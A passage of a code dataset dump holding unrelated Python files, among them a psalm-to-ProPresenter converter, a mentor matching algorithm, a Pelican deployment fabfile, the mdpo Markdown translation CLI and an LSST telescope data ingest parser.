convert_unicode_chars(text):\n def conv_char(c):\n o = ord(c)\n if o < 128:\n return c\n else:\n return rf'\\u{o} '\n\n chars = [conv_char(char) for char in text]\n return ''.join(chars)\n\n\ndef MakeRTFBlob(text, font_colour, font_size):\n slide = '{\\\\rtf1\\\\ansi\\\\ansicpg1252\\\\cocoartf1038\\\\cocoasubrtf360{\\\\fonttbl\\\\f0\\\\fswiss\\\\fcharset0 ' + DEFAULT_FONT + ';}' \\\n + '{\\\\colortbl;\\\\red' + font_colour[0] + '\\\\green' + font_colour[1] + '\\\\blue' + font_colour[2] + ';}' \\\n + '\\\\pard\\\\tx560\\\\tx1120\\\\tx1680\\\\tx2240\\\\tx2800\\\\tx3360\\\\tx3920\\\\tx4480\\\\tx5040\\\\tx5600\\\\tx6160\\\\tx6720\\\\qc\\\\pardirnatural' \\\n + '\\\\f0\\\\fs' + str(font_size * 2) + '\\\\fsmilli51200 \\\\cf1 \\\\expnd0\\\\expndtw0\\\\kerning0 \\\\uc0 ' + \\\n convert_unicode_chars(text.lstrip(\"\\n\")) + '}'\n slide = SuperScRTF(slide)\n slide = underline_slide(slide)\n slide = slide.replace('\\n', '\\\\\\n')\n return b64encode(slide.encode()).decode()\n\n\ndef SlideBlock(text, screen_size, font_colour, background_colour):\n if screen_size[0] == '1080':\n font_size = 90\n else:\n font_size = 72\n\n return '<_-RVRect3D-_position x=\"0\" y=\"0\" z=\"0\" width=\"' + \\\n screen_size[1] + \\\n '\" height=\"' + \\\n screen_size[0] + \\\n '\"><_-D-_serializedShadow containerClass=\"NSMutableDictionary\"><_-RVProTransitionObject-_transitionObject transitionType=\"-1\" transitionDuration=\"1\" motionEnabled=\"0\" motionDuration=\"20\" motionSpeed=\"100\">'\n\n\ndef HeaderBlock(Name='New Song',\n Authors='',\n Artist='',\n CCLICopyRightInfo='',\n CCLILicenceNumber='',\n Publisher='',\n Notes='',\n height=\"1080\",\n width=\"1920\",\n category=\"\"):\n\n return '<_-RVProTransitionObject-_transitionObject transitionType=\"-1\" transitionDuration=\"1\" motionEnabled=\"0\" motionDuration=\"20\" motionSpeed=\"100\">'\n\n\nFooterBlock = ''\n\n\ndef write_prop(psalm, screen_size, font_colour, background_colour, underline, extra_slide, output_folder):\n to_write = \"\"\n if extra_slide:\n psalm['stanzas'] = [\"\"] + psalm['stanzas']\n for v in psalm['stanzas']:\n if not underline:\n v = remove_markup(v)\n\n to_write += SlideBlock(\n v,\n screen_size,\n font_colour,\n background_colour\n )\n\n if psalm['book'] == \"Sing Psalms\":\n copyright_field = \"Free Church of Scotland\"\n else:\n copyright_field = \"\"\n # Prepare Header Block to write:\n to_write_header = HeaderBlock(\n Name=psalm['name'],\n Artist='',\n CCLILicenceNumber='',\n Notes=psalm['metre'],\n CCLICopyRightInfo=copyright_field,\n Publisher='',\n Authors=psalm['book'],\n height=screen_size[0],\n width=screen_size[1],\n category=psalm['book'])\n to_write = to_write_header + \\\n '' + \\\n to_write + \\\n '' + \\\n FooterBlock\n # Now actually write the thing.\n with open(os.path.join(output_folder, psalm['file_name'] + '.pro5'), 'w') as f:\n f.write(to_write)\n\n\ndef convert2propresenter(screen_size=(\"1080\", \"1920\"), font_colour=('0', '0', '0'), background_colour=('1', '1', '1', '1'), colour_name='b_w', underline=False, extra_slide=False):\n \"\"\"Convert Psalms to propresenter files.\"\"\"\n ratio = \"x\".join(screen_size)\n folder_ids = [ratio, colour_name]\n if underline:\n folder_ids.append(\"underlined\")\n if extra_slide:\n folder_ids.append(\"stcs\")\n # sing psalms\n file_name = \"Sing Psalms\"\n output_folder = make_output_folder([\"ProPresenter5\", '_'.join(folder_ids), file_name])\n psalms = load_sing_psalms()\n for psalm in psalms:\n write_prop(psalm, screen_size, font_colour, background_colour, underline, 
extra_slide, output_folder)\n\n # scottish psalter\n file_name = \"Scottish Psalter\"\n output_folder = make_output_folder([\"ProPresenter5\", '_'.join(folder_ids), file_name])\n psalms = load_scottish_psalter()\n for psalm in psalms:\n write_prop(psalm, screen_size, font_colour, background_colour, underline, extra_slide, output_folder)\n\n zip_folder(os.path.dirname(output_folder))\n remove_folder(os.path.dirname(output_folder))\n\nif __name__ == '__main__':\n convert2propresenter()\n","sub_path":"tools/convert2propresenter.py","file_name":"convert2propresenter.py","file_ext":"py","file_size_in_byte":8584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"542634427","text":"from collections import deque\nfrom mentormatch.api.applicant.applicant_collection import ApplicantCollection\nfrom mentormatch.api.initializer.initializer_abc import Initializer\nfrom mentormatch.api.sorter.sorter_context_mgr import SorterContextMgr\n\n\nclass Matcher:\n\n def __init__(\n self,\n mentors: ApplicantCollection,\n mentees: ApplicantCollection,\n initializer: Initializer,\n ranker_context_mgr: SorterContextMgr,\n ):\n self._mentors = mentors\n self._mentees = mentees\n self._initializer = initializer\n self._sorter_context_mgr = ranker_context_mgr\n\n def execute(self) -> None:\n\n ################\n # Mentee Deque #\n ################\n unpaired_mentees = \\\n deque(filter(lambda _mentee: _mentee.is_available, self._mentees))\n self._sorter_context_mgr.set_initializing_sort()\n for mentee in unpaired_mentees:\n potential_pairs = self._initializer.get_potential_pairs(mentee)\n mentee.potential_pairs = sorted(potential_pairs)\n mentee.restart_count = 0\n\n self._sorter_context_mgr.set_matching_sort()\n while len(unpaired_mentees) > 0:\n\n ###########################\n # Get next potential pair #\n ###########################\n mentee = unpaired_mentees.pop()\n if len(mentee.potential_pairs) > 0:\n # Let's now try to pair this mentee\n pair = mentee.potential_pairs.pop()\n mentor = pair.mentor\n ##############################\n # Assign this potential pair #\n ##############################\n mentee.assign_pair(pair)\n mentor.assign_pair(pair)\n #############################\n # Resolve overloaded mentor #\n #############################\n if mentor.over_capacity:\n rejected_pair = mentor.remove_pair()\n rejected_mentee = rejected_pair.mentee\n rejected_mentee.remove_pair()\n unpaired_mentees.appendleft(rejected_mentee)\n elif mentee.favored and mentee.restart_count < 7:\n # We really want this mentee paired, so we let her go again.\n # She is more likely to get paired next time around.\n mentee.potential_pairs = \\\n self._initializer.get_potential_pairs(mentee)\n mentee.restart_count += 1\n unpaired_mentees.appendleft(mentee)\n continue\n","sub_path":"mentormatch/api/matcher/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"217436504","text":"# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nimport os\n\nfrom pants.backend.jvm.subsystems.zinc import Zinc\nfrom pants.backend.jvm.targets.java_library import JavaLibrary\nfrom pants.backend.jvm.tasks.classpath_products import ClasspathProducts\nfrom pants.backend.jvm.tasks.jvm_compile.jvm_compile import JvmCompile\nfrom pants.backend.jvm.tasks.jvm_compile.zinc.zinc_compile import 
BaseZincCompile\nfrom pants.backend.jvm.tasks.nailgun_task import NailgunTaskBase\nfrom pants.base.build_environment import get_buildroot\nfrom pants_test.jvm.nailgun_task_test_base import NailgunTaskTestBase\n\n\nclass DummyJvmCompile(JvmCompile):\n pass\n\n\nclass JvmCompileTest(NailgunTaskTestBase):\n DEFAULT_CONF = 'default'\n\n @classmethod\n def task_type(cls):\n return DummyJvmCompile\n\n def test_if_runtime_classpath_exists(self):\n target = self.make_target(\n 'java/classpath:java_lib',\n target_type=JavaLibrary,\n sources=['com/foo/Bar.java'],\n )\n\n context = self.context(target_roots=[target])\n compile_classpath = context.products.get_data('compile_classpath', ClasspathProducts.init_func(self.pants_workdir))\n\n compile_entry = os.path.join(self.pants_workdir, 'compile-entry')\n pre_init_runtime_entry = os.path.join(self.pants_workdir, 'pre-inited-runtime-entry')\n compile_classpath.add_for_targets([target], [('default', compile_entry)])\n runtime_classpath = context.products.get_data('runtime_classpath', ClasspathProducts.init_func(self.pants_workdir))\n\n runtime_classpath.add_for_targets([target], [('default', pre_init_runtime_entry)])\n\n task = self.create_task(context)\n resulting_classpath = task.create_runtime_classpath()\n self.assertEqual([('default', pre_init_runtime_entry), ('default', compile_entry)],\n resulting_classpath.get_for_target(target))\n\n\nclass BaseZincCompileJDKTest(NailgunTaskTestBase):\n DEFAULT_CONF = 'default'\n old_cwd = os.getcwd()\n\n @classmethod\n def task_type(cls):\n return BaseZincCompile\n\n def setUp(self):\n os.chdir(get_buildroot())\n super().setUp()\n\n def tearDown(self):\n os.chdir(self.old_cwd)\n super().tearDown()\n\n def test_subprocess_compile_jdk_being_symlink(self):\n context = self.context(target_roots=[])\n zinc = Zinc.Factory.global_instance().create(context.products, NailgunTaskBase.SUBPROCESS)\n self.assertTrue(os.path.islink(zinc.dist.home))\n\n def test_hermetic_jdk_being_underlying_dist(self):\n context = self.context(target_roots=[])\n zinc = Zinc.Factory.global_instance().create(context.products, NailgunTaskBase.HERMETIC)\n self.assertFalse(\n os.path.islink(zinc.dist.home),\n \"Expected {} to not be a link, it was.\".format(zinc.dist.home)\n )\n","sub_path":"tests/python/pants_test/backend/jvm/tasks/jvm_compile/test_jvm_compile.py","file_name":"test_jvm_compile.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"404643825","text":"# xcttp://matxcworld.wolfram.com/Circle-LineIntersection.xctml\nfrom math import sqrt\n\nEPS = 1 * 10**-5\n\n\ndef distance(x1, y1, x2, y2):\n return sqrt((x2 - x1)**2 + (y2 - y1)**2)\n\n\ndef on_circle(x1, y1, x2, y2, x3, y3):\n d = distance(\n x1, y1, x3, y3\n ) + distance(x3, y3, x2, y2) - distance(x1, y1, x2, y2)\n if d < EPS:\n return True\n\n return\n\n\ndef sgn(x):\n if x < 0:\n return -1\n else:\n return 1\n\n\ndef intersection(x1, y1, x2, y2, xc, yc, r):\n x1, y1, x2, y2 = x1 - xc, y1 - yc, x2 - xc, y2 - yc # circle at (0, 0)\n\n dx = x2 - x1\n dy = y2 - y1\n dr = sqrt(dx**2 + dy**2)\n det = x1 * y2 - x2 * y1\n discriminant = r**2 * dr**2 - det**2\n\n if discriminant < 0:\n return False\n\n for i in [(1, 1), (-1, 1), (1, -1), (-1, -1)]:\n x = (det * dy + i[0] * sgn(dy)*dx*sqrt(r**2 * dr**2 - det**2)) / dr**2\n y = (-det * dx + i[1] * abs(dy) * sqrt(r**2 * dr**2 - det**2)) / dr**2\n if on_circle(x1, y1, x2, y2, x, y):\n return True\n return False\n\n\ndef main():\n t = 
int(input())\n\n for t_itr in range(t):\n xc, yc, r = map(int, input().rstrip().split())\n\n x1, y1 = map(int, input().rstrip().split())\n x2, y2 = map(int, input().rstrip().split())\n x3, y3 = map(int, input().rstrip().split())\n\n if any([\n intersection(x1, y1, x2, y2, xc, yc, r,),\n intersection(x1, y1, x3, y3, xc, yc, r,),\n intersection(x2, y2, x3, y3, xc, yc, r,),\n ]):\n print('YES')\n else:\n print('NO')\n\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sherlock_geometry.py","file_name":"sherlock_geometry.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"468230720","text":"import pandas as pd\nimport video_data\nimport displayData\nimport os.path\nfrom os import path\n\n\ndef main():\n\n table_name = 'VIDEOS'\n db_filename = 'videos.db'\n\n # Database not created\n if not path.exists(\"videos.db\"):\n # Read watch history data and convert to df\n watchHistory_json = 'C:\\\\Users\\\\danie\\\\Desktop\\\\CS-Projects\\\\YouTube_Screentime\\\\Takeout\\\\YouTube and YouTube Music\\\\history\\\\watch-history.json'\n watchHistory_df = pd.read_json(watchHistory_json) \n \n # Clean and format data\n df = video_data.format_takeoutData(watchHistory_df)\n \n # Pull additional data such as Category and View Count\n df = video_data.get_data(df)\n\n # Store data in .db file\n video_data.store_data(db_filename,table_name,df)\n\n \n # load data from database\n df = video_data.load_data(db_filename,table_name)\n\n # Create Dashboard and plot data \n df = df[:5000] # sample set\n displayData.plot_data(df)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"324697074","text":"# coding=utf-8\r\nfrom pandas import DataFrame\r\nfrom trade import TradeInfo\r\nfrom trade.policy import DefaultTradePolicy\r\nfrom trade.policy.Parameter import Param\r\n\r\n__author__ = 'Cedric Zhuang'\r\n\r\n\r\n# 交易策略\r\n#\r\n# 买入随机\r\n# 30 天内最高值 回落 15%\r\n#\r\n#\r\n# 持有天数\r\n# 2\t\t\t [-5, 5]\r\n# 5\t\t\t [-4, 7]\r\n# 10\t\t\t[-3, 10]\r\n# 15\t\t [0, 15]\r\n# 30\t\t\t[5, 30]\r\n# 60\t\t\t[5, 50]\r\n# 120\t\t\t[40, 100]\r\n# 240\t\t\t[70, 150]\r\n\r\nclass RangeTradePolicy(DefaultTradePolicy):\r\n def __init__(self):\r\n super(RangeTradePolicy, self).__init__()\r\n self.full_policy = None\r\n # set to default range policy for test\r\n self.set_range_policy({\r\n 1: [-2, 9],\r\n 2: [-4, 7],\r\n 3: [0, 1]\r\n })\r\n\r\n def get_config(self):\r\n configs = super(RangeTradePolicy, self).get_config()\r\n range_policy = Param.create(\"range_policy\", Param.Type.MAP)\r\n return configs + [range_policy]\r\n\r\n def get_pretty_range_policy(self):\r\n policy_frame = DataFrame(self.full_policy).T\r\n policy_frame.index.name = 'day'\r\n policy_frame.columns = ['cut', 'profit']\r\n # skip record zero\r\n return policy_frame[1:]\r\n\r\n def get_sell_strategy(self, holding, record, trade_days):\r\n high_percentage = (record.high - holding.price) * 100 / holding.price\r\n low_percentage = (record.low - holding.price) * 100 / holding.price\r\n sell_price = None\r\n keep = False\r\n if trade_days in self.full_policy:\r\n sell_low, sell_high = self.full_policy[trade_days]\r\n if low_percentage <= sell_low:\r\n sell_price = holding.price * (1 + sell_low / 100.0)\r\n elif high_percentage >= sell_high:\r\n sell_price = holding.price * (1 + sell_high / 
100.0)\r\n else:\r\n keep = True\r\n if not RangeTradePolicy.is_price_achievable(sell_price, record):\r\n keep = True\r\n sell_price = None\r\n else:\r\n sell_price = record.open\r\n return keep, sell_price\r\n\r\n def get_buy_strategy(self, holding, record):\r\n should_buy = holding is None or holding.share == 0\r\n buy_price = None\r\n if should_buy:\r\n buy_price = record.open\r\n return should_buy, buy_price\r\n\r\n def set_range_policy(self, skeleton):\r\n self.full_policy = {0: (-100, 100)}\r\n max_days = max(skeleton.keys()) + 1\r\n for day in xrange(1, max_days):\r\n for i in xrange(day, max_days):\r\n if i in skeleton:\r\n self.full_policy[day] = skeleton[i]\r\n break\r\n\r\n def get_range_policy(self):\r\n return self.full_policy","sub_path":"source/trade/policy/RangeTradePolicy.py","file_name":"RangeTradePolicy.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"120849653","text":"from fabric.api import *\nimport fabric.contrib.project as project\nimport os\nimport shutil\nimport sys\nimport SocketServer\n\nfrom pelican.server import ComplexHTTPRequestHandler\n\n# Local path configuration (can be absolute or relative to fabfile)\nenv.deploy_path = 'output'\nDEPLOY_PATH = env.deploy_path\n\n# Remote server configuration\nproduction = 'nikolai@incolumitas.com'\ndest_path = '/var/www/incolumitas.com/'\n\n# Port for `serve`\nPORT = 8000\n\ndef clean():\n \"\"\"Remove generated files\"\"\"\n if os.path.isdir(DEPLOY_PATH):\n shutil.rmtree(DEPLOY_PATH)\n os.makedirs(DEPLOY_PATH)\n\ndef build():\n \"\"\"Build local version of site\"\"\"\n local('pelican -s pelicanconf.py')\n\ndef rebuild():\n \"\"\"`clean` then `build`\"\"\"\n clean()\n build()\n\ndef regenerate():\n \"\"\"Automatically regenerate site upon file modification\"\"\"\n local('pelican -r -s pelicanconf.py')\n\ndef serve():\n \"\"\"Serve site at http://localhost:8000/\"\"\"\n os.chdir(env.deploy_path)\n\n class AddressReuseTCPServer(SocketServer.TCPServer):\n allow_reuse_address = True\n\n server = AddressReuseTCPServer(('', PORT), ComplexHTTPRequestHandler)\n\n sys.stderr.write('Serving on port {0} ...\\n'.format(PORT))\n server.serve_forever()\n\ndef reserve():\n \"\"\"`build`, then `serve`\"\"\"\n build()\n serve()\n\ndef preview():\n \"\"\"Build production version of site\"\"\"\n local('pelican -s publishconf.py')\n\ndef reload_isso():\n local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"systemctl daemon-reload && systemctl restart isso && systemctl restart nginx\"')\n local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"/var/lib/isso/env/bin/isso --version\"')\n\n@hosts(production)\ndef isso():\n \"\"\"Publish isso to production\"\"\"\n # local('scp -i /home/nikolai/.ssh/root_new_server /home/nikolai/projects/work/backups/var/lib/isso/comments.db root@167.99.241.135:/var/lib/isso/comments.db')\n local('scp -i /home/nikolai/.ssh/root_new_server /home/nikolai/projects/private/incolumitas/incolumitas/isso/isso.cfg root@167.99.241.135:/etc/isso.cfg')\n local('scp -i /home/nikolai/.ssh/root_new_server /home/nikolai/projects/private/incolumitas/incolumitas/isso/isso_nginx.conf root@167.99.241.135:/etc/nginx/sites-available/isso_nginx.conf')\n # local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"ln -s /etc/nginx/sites-available/isso_nginx.conf /etc/nginx/sites-enabled/isso_nginx.conf\"')\n local('scp -i /home/nikolai/.ssh/root_new_server 
/home/nikolai/projects/private/incolumitas/incolumitas/isso/isso.service root@167.99.241.135:/etc/systemd/system/isso.service')\n reload_isso()\n\n@hosts(production)\ndef publish2():\n \"\"\"Publish to production via rsync\"\"\"\n local('pelican -s publishconf.py')\n local(\"\"\"rsync -avc --delete -e \"ssh -i /home/nikolai/.ssh/root_new_server\" output/ root@167.99.241.135:/var/www/incolumitas.com/\"\"\")\n local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"chown -R www-data:www-data /var/www/incolumitas.com/\"')\n reload_isso()","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"588468687","text":"from curio import meta\nfrom curio import *\nimport time\n\ndef test_blocking(kernel):\n @meta.blocking\n def func():\n return 1\n\n async def main():\n r = await func()\n assert r == 1\n\n assert func() == 1\n\n kernel.run(main)\n\n@meta.cpubound\ndef cpufunc():\n return 1\n\ndef test_cpubound(kernel):\n async def main():\n r = await cpufunc()\n assert r == 1\n\n assert cpufunc() == 1\n kernel.run(main)\n\n\n \n","sub_path":"tests/test_meta.py","file_name":"test_meta.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"409526511","text":"#!/usr/bin/env python\n\n\"\"\"md2po2md command line interface.\"\"\"\n\nimport argparse\nimport sys\n\nfrom mdpo.cli import (\n add_common_cli_first_arguments,\n add_common_cli_latest_arguments,\n add_debug_option,\n add_encoding_arguments,\n add_extensions_argument,\n add_nolocation_option,\n add_pre_commit_option,\n parse_command_aliases_cli_arguments,\n)\nfrom mdpo.context import environ\nfrom mdpo.md2po2md import markdown_to_pofile_to_markdown\nfrom mdpo.md4c import DEFAULT_MD4C_GENERIC_PARSER_EXTENSIONS\n\n\nDESCRIPTION = (\n 'Translates Markdown files using PO files for a set of predefined language'\n ' codes creating multiple directories, one for each language.'\n)\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(description=DESCRIPTION, add_help=False)\n add_common_cli_first_arguments(parser, quiet=False)\n parser.add_argument(\n 'input_paths_glob', metavar='GLOB', nargs='*',\n help='Glob to markdown input files to translate.'\n ' If not provided, will be read from STDIN.',\n )\n parser.add_argument(\n '-l', '--lang', dest='langs', default=[], action='append',\n help='Language codes used to create the output directories.'\n ' Can be passed multiple times.',\n metavar='LANG',\n )\n parser.add_argument(\n '-o', '--output', dest='output_paths_schema',\n required=True, type=str,\n help='Path schema for outputs, built using placeholders. There is a'\n ' mandatory placeholder for languages: \\'{lang}\\'; and one'\n ' optional for output basename: \\'{basename}\\'. For example,'\n ' for the schema \\'locale/{lang}\\', the languages \\'es\\' and'\n ' \\'fr\\' and a \\'README.md\\' as input, the next files will be'\n ' written: \\'locale/es/README.po\\', \\'locale/es/README.md\\','\n ' \\'locale/fr/README.po\\' and \\'locale/fr/README.md\\'.'\n ' Note that you can omit \\'{basename}\\', specifying a'\n ' directory for each language with \\'locale/{lang}\\' for this'\n ' example. 
Unexistent directories and files will be created, '\n ' so you don\\'t have to prepare the output directories before'\n ' the execution.',\n metavar='PATH_SCHEMA',\n )\n add_nolocation_option(parser)\n add_extensions_argument(parser)\n add_common_cli_latest_arguments(parser)\n add_encoding_arguments(parser)\n add_debug_option(parser)\n add_pre_commit_option(parser)\n return parser\n\n\ndef parse_options(args=[]):\n parser = build_parser()\n if '-h' in args or '--help' in args:\n parser.print_help()\n sys.exit(1)\n opts, unknown = parser.parse_known_args(args)\n\n input_paths_glob = ''\n if not sys.stdin.isatty():\n input_paths_glob += sys.stdin.read().strip('\\n')\n if isinstance(opts.input_paths_glob, list) and opts.input_paths_glob:\n input_paths_glob += opts.input_paths_glob[0]\n opts.input_paths_glob = input_paths_glob\n\n if opts.extensions is None:\n opts.extensions = DEFAULT_MD4C_GENERIC_PARSER_EXTENSIONS\n\n opts.command_aliases = parse_command_aliases_cli_arguments(\n opts.command_aliases,\n )\n\n return opts\n\n\ndef run(args=[]):\n exitcode = 0\n\n with environ(_MDPO_RUNNING='true'):\n opts = parse_options(args)\n\n kwargs = dict(\n extensions=opts.extensions,\n command_aliases=opts.command_aliases,\n debug=opts.debug,\n location=opts.location,\n po_encoding=opts.po_encoding,\n md_encoding=opts.md_encoding,\n )\n\n _saved_files_changed = markdown_to_pofile_to_markdown(\n opts.langs,\n opts.input_paths_glob,\n opts.output_paths_schema,\n _check_saved_files_changed=opts.check_saved_files_changed,\n **kwargs,\n )\n if ( # pragma: no cover\n opts.check_saved_files_changed and _saved_files_changed\n ):\n exitcode = 1\n return exitcode\n\n\ndef main():\n sys.exit(run(args=sys.argv[1:])) # pragma: no cover\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"mdpo/md2po2md/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"594290113","text":"import os\nimport re\nimport lsst.daf.base as dafBase\nfrom lsst.pipe.tasks.ingest import ParseTask\nfrom lsst.pipe.tasks.ingestCalibs import CalibsParseTask\nfrom lsst.obs.ctio0m9.ctio0m9Mapper import sanitize_date\n\n\nEXTENSIONS = [\"fits\", \"gz\", \"fz\"] # Filename extensions to strip off\n\n\ndef mjdToVisit(date_obs):\n \"\"\"Generate a visit number given a DATE-OBS\n\n @param[in] date_obs a dafBase.DateTime.MJD compliant string\n @return visit_num visit number generated from date_obs\n \"\"\"\n dt = dafBase.DateTime(date_obs, dafBase.DateTime.TAI)\n # MJD is actually the default\n mjd = dt.get(dafBase.DateTime.MJD)\n # relative to 2010-01-01, just to make the visits a tiny bit smaller\n mmjd = mjd - 55197\n # 86400s per day, so we need this resolution\n return int(1e5*mmjd)\n\n\nclass Ctio0m9ParseTask(ParseTask):\n \"\"\"Parser suitable for ctio0m9 data\n \"\"\"\n\n def getInfo(self, filename):\n \"\"\"Get information about the image from the filename and its contents.\n\n Here, scrape the basename from the filename, and then call the\n baseclass to open the image and parse the header.\n\n @param filename Name of file to inspect\n @return File properties; list of file properties for each extension\n \"\"\"\n phuInfo, infoList = ParseTask.getInfo(self, filename)\n\n # Grab the basename\n pathname, basename = os.path.split(filename)\n basename = re.sub(r\"\\.(%s)$\" % \"|\".join(EXTENSIONS), \"\", basename)\n\n phuInfo['basename'] = basename\n\n return phuInfo, infoList\n\n # Add an entry to 
config.parse.translators in config/ingest.py if needed\n def translate_visit(self, md):\n \"\"\"Generate a unique visit number from the timestamp\n\n @param[in] md image metadata\n \"\"\"\n return mjdToVisit(md.getScalar(\"DATE-OBS\"))\n\n def translate_imgType(self, md):\n \"\"\"Determine the type of image being taken (bias, dark etc).\n\n Get the image type (e.g. bias, dark, flat etc) from the metadata (md).\n Translator function derived from a very small dataset from the\n observatory i.e. may well need adding to when new string values are\n found.\n\n @param[in] md image metadata\n @return The image type, as mapped by the dict in this function\n \"\"\"\n val = md.getScalar(\"IMAGETYP\").rstrip().lstrip()\n conversion = {'dflat': 'flat',\n 'DFLAT': 'flat',\n 'DOME FLAT': 'flat',\n 'dark': 'dark',\n 'zero': 'bias',\n 'BIAS': 'bias',\n 'Focus': 'focus',\n 'FOCUS': 'focus',\n 'sflat': 'flat',\n 'object': 'object',\n 'OBJECT': 'object'}\n\n if val in conversion:\n return conversion[val]\n else:\n self.log.warn('Unknown image type %s found in IMAGETYP key', val)\n return None\n\n def translate_wavelength(self, md):\n \"\"\"Get the illumination wavelength.\n\n Get the monochromator wavelength from the header, for flats only.\n Method will need ammending if/when this value is written elsewhere\n\n @param[in] md image metadata\n @return wavelength in nm\n \"\"\"\n val = md.getScalar(\"OBJECT\").rstrip().lstrip()\n if self.translate_imgType(md) != 'flat':\n return float('nan') # defaults to NaN if not a flat\n if val[0:4].isdigit():\n wavelength = float(val[0:4])\n elif val[0:3].isdigit():\n wavelength = float(val[0:3])\n # We don't know what might be stored here,\n # so a little sanity checking is good\n if wavelength < 300 or wavelength > 1150:\n self.log.warn('Found a wavelength of %s, '\n 'which lies outside of the expected range.', wavelength)\n return wavelength\n return float('nan')\n\n def _translate_filter(self, val):\n \"\"\"Definition of the filter sanitization mappings.\n Add values to the dictionary as needed when new values are found in\n the data\"\"\"\n conversion = {'SEMROCK': 'SEMROCK',\n 'Semrock': 'SEMROCK',\n 'RONCHI400': 'RONCHI400',\n 'RONCHI200': 'RONCHI200',\n 'ronchi': 'RONCHI200',\n 'Ronchi': 'RONCHI200',\n 'RONCHI': 'RONCHI200',\n 'NONE': 'NONE',\n 'no_filter': 'NONE',\n 'OPEN': 'NONE',\n 'CLEAR': 'NONE',\n 'clear': 'NONE',\n 'Clear': 'NONE',\n 'OPEN5': 'NONE',\n 'OPEN8': 'NONE',\n 'dia': 'NONE',\n 'FGB37': 'FGB37',\n 'FGC715S': 'FGC715S',\n 'u': 'u',\n 'g': 'g',\n 'r': 'r',\n 'i': 'i',\n 'z': 'z',\n 'nv': 'nv',\n 'b': 'b',\n 'cb': 'cb',\n 'RG715': 'RG715',\n 'f5025/1023': 'f5025/1023',\n 'Halfa': 'Halfa',\n 'ZG': 'ZG',\n 'FREE': 'NONE',\n 'free': 'NONE',\n 'Thor300': 'Thor300',\n 'Ron200': 'RONCHI200',\n 'Ron400': 'RONCHI400',\n 'HoloPhP': 'HoloPhP',\n 'HoloAmAg': 'HoloAmAg',\n 'HoloPhAg': 'HoloPhAg',\n }\n\n if val in conversion:\n return conversion[val]\n else:\n self.log.warn('Unmapped filter type %s found when translating filter', val)\n # avoiding using None, as this is an alias for clear/no_filter\n return 'UNKNOWN_FILTER'\n\n def translate_filter(self, md):\n \"\"\"Generate the standardised composite name of the two filters.\n\n Map the filters used to a standard name, and concatenate as a string,\n so that flats can be generated for each filter pair easily. 
Individual\n filter name sanitisation is done by the _translate_filter() function\n so it only has to be defined in one place.\n\n @param[in] md image metadata\n @return sanitized and concatenated filter name\n \"\"\"\n filt1 = self._translate_filter(md.getScalar(\"FILTER1\").rstrip().lstrip())\n filt2 = self._translate_filter(md.getScalar(\"FILTER2\").rstrip().lstrip())\n sorted_filter = [filt1, filt2]\n # we want to be insensitive to filter order, for now at least\n sorted_filter.sort()\n filter_name = '+'.join(_ for _ in sorted_filter)\n return filter_name\n\n def translate_dateobs(self, md):\n \"\"\"Translate the non-compliant DATE-OBS values\n\n @param[in] md image metadata\n @return compliant DATE-OBS string\n \"\"\"\n md = sanitize_date(md)\n return md.getScalar('DATE-OBS')\n\n def translate_filter1(self, md):\n \"\"\"Standardize the filter naming.\n\n Map the filter used to a standard name for the filter, as defined in\n the _translate_filter() function.\n\n @param[in] md image metadata\n @return sanitized filter name\n \"\"\"\n val = md.getScalar(\"FILTER1\").rstrip().lstrip()\n return self._translate_filter(val)\n\n def translate_filter2(self, md):\n \"\"\"Standardize the filter naming.\n\n Map the filter used to a standard name for the filter, as defined in\n the _translate_filter() function.\n\n @param[in] md image metadata\n @return sanitized filter name\n \"\"\"\n val = md.getScalar(\"FILTER2\").rstrip().lstrip()\n return self._translate_filter(val)\n\n\nclass Ctio0m9CalibsParseTask(CalibsParseTask):\n \"\"\"Parser for calibs\"\"\"\n\n def _translateFromCalibId(self, field, md):\n \"\"\"Get a value from the CALIB_ID written by constructCalibs\"\"\"\n data = md.getScalar(\"CALIB_ID\")\n match = re.search(r\".*%s=(\\S+)\" % field, data)\n return match.groups()[0]\n\n def translate_filter(self, md):\n \"\"\"Translate the filter name\n @param[in] md image metadata\n @return translated filter name\n \"\"\"\n return self._translateFromCalibId(\"filter\", md)\n\n def translate_calibDate(self, md):\n \"\"\"Translate the calib date\n @param[in] md image metadata\n @return translated calib date\n \"\"\"\n return self._translateFromCalibId(\"calibDate\", md)\n\n def translate_ccd(self, md):\n \"\"\"Return the CCD number\n @param[in] md image metadata, unused\n @return 0\n \"\"\"\n return 0\n","sub_path":"python/lsst/obs/ctio0m9/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 